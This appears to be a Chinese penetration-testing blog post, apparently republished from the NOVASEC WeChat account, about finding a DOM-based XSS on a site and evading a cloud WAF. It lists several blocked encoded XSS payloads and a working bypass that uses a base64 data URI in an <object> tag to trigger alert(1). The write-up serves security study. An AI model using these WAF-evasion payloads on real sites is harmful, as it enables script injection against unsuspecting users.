渗透实战 dom型XSS绕过云平台waf防护

  • A+
所属分类:安全文章
△△△点击上方“蓝字”关注我们了解更多精彩





0x00 前言
其实呢,这篇文章也是年前的时候师傅的投稿,但是因为电脑问题,也就一拖在拖。
在这里感谢想学点black技术师傅的投稿,同时也欢迎各位师傅的投稿。



0x01 发现漏洞
输入">,构造闭合

渗透实战 dom型XSS绕过云平台waf防护

立即查询,哦豁,漏洞存在,页面的HTML代码发生了改变

渗透实战 dom型XSS绕过云平台waf防护

那么,接下来肯定是F12看闭合了啊

渗透实战 dom型XSS绕过云平台waf防护





0x02 漏洞探测
接下来肯定是愉快的漏洞探测喽

云平台防护拦截:

以下xss payload均被拦截:
"><audio src=1 onerror=alert(/xss/);>"><audio src=1 onerror=prompt('xss');>
<--!//html编码+非编码混合-->
">&lt;img  longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//&amp;quot;" src="x" alt="showme"&gt;"><[%00]img onerror=alert(1) src=a>
<--!url双编码--> %2522%253E%253Cimg%2520onerror=alert(1)%2520src=a%253E
<--!Unicode编码、使用js转义、Unicode转义可以用于表示js关键词中的字符-->
"><%00EEEE<svg ////ONLoad='au006cu0065u0072u0074(1)'///>svg>%0APayload"><html " onmouseover=/*&lt;svg/*/onload=alert(2)//>
<--!纯HTML编码-->
&quot;&gt;&lt;html &quot; onmouseover=/*&amp;lt;svg/*/onload=alert(2)//&gt;
<--!eval-->
">`<script>'alert(1)'.replace(/.+/,eval)</script>`

渗透实战 dom型XSS绕过云平台waf防护

以下未被拦截:

但均未造成弹窗

"><ijavascriptmg+src+ojavascriptnerror=confirm(1)>">    <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="></object>
emmm,一定是我姿势不对。

考虑了一秒钟中后,重新构造payload:

"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
简单解释一下:其中PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==为base64编码的<script>alert(1)</script>
object定义和用法--脚本伪协议
定义一个嵌入的对象。请使用此元素向您的 XHTML 页面添加多媒体。此元素允许您规定插入 HTML 文档中的对象的数据和参数,以及可用来显示和操作数据的代码。
<object> 标签用于包含对象,比如图像、音频、视频、Java applets、ActiveX、PDF 以及 Flash。
object 的初衷是取代 img 和 applet 元素。不过由于漏洞以及缺乏浏览器支持,这一点并未实现。
浏览器的对象支持有赖于对象类型。不幸的是,主流浏览器都使用不同的代码来加载相同的对象类型。
而幸运的是,object 对象提供了解决方案。如果未显示 object 元素,就会执行位于 <object> 和 </object> 之间的代码。通过这种方式,我们能够嵌套多个 object 元素(每个对应一个浏览器)。

成功弹窗,如下:

渗透实战 dom型XSS绕过云平台waf防护

渗透实战 dom型XSS绕过云平台waf防护

渗透实战 dom型XSS绕过云平台waf防护

打完收工。




0x09 Summary 总结

免责声明

安全法镇场!

http://www.fjcpc.edu.cn/jgdzz/2020/0424/c2231a65107/page.htm

本文仅做技术分享,切勿用于非法用途!

如有违反,于本文无关!






END



如您有任何投稿、问题、建议、需求、合作、后台留言NOVASEC公众号!


或添加NOVASEC-MOYU 以便于及时回复。

渗透实战 dom型XSS绕过云平台waf防护


感谢大哥们的对NOVASEC的支持点赞和关注

加入我们与萌新一起成长吧!


本团队任何技术及文件仅用于学习分享,请勿用于任何违法活动,感谢大家的支持!



本文始发于微信公众号(NOVASEC):渗透实战 dom型XSS绕过云平台waf防护

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: